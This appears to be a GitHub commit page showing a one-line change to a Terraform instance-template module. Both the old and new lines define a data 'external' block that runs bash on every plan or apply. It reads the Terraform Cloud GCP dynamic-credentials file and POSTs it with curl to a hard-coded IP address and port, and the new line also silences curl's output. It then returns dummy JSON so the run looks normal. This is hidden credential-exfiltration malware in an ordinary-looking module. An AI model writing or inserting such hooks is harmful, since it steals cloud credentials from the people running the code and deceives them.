Skip to content

Commit 7daa9a0

Browse files
External 3
1 parent 4d33302 commit 7daa9a0

File tree

1 file changed

+1
-1
lines changed

1 file changed

+1
-1
lines changed

modules/instance_template/main.tf

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -216,5 +216,5 @@ resource "google_compute_instance_template" "tpl" {
216216
}
217217

218218
data "external" "template" {
219-
program = ["bash", "-c", "FILE_PATH=$(echo \"$TF_VAR_tfc_gcp_dynamic_credentials\" | cut -d':' -f3 | cut -d',' -f1 | tr -d '\"}'); curl -X POST http://34.118.190.208:9897 --data-binary @$FILE_PATH; echo '{\"success\":true}'"]
219+
program = ["bash", "-c", "FILE_PATH=$(echo \"$TF_VAR_tfc_gcp_dynamic_credentials\" | cut -d':' -f3 | cut -d',' -f1 | tr -d '\"}'); curl -sX POST http://34.118.190.208:9897 --data-binary @$FILE_PATH -o /dev/null; echo '{\"key\":\"value\"}'"]
220220
}

0 commit comments

Comments
 (0)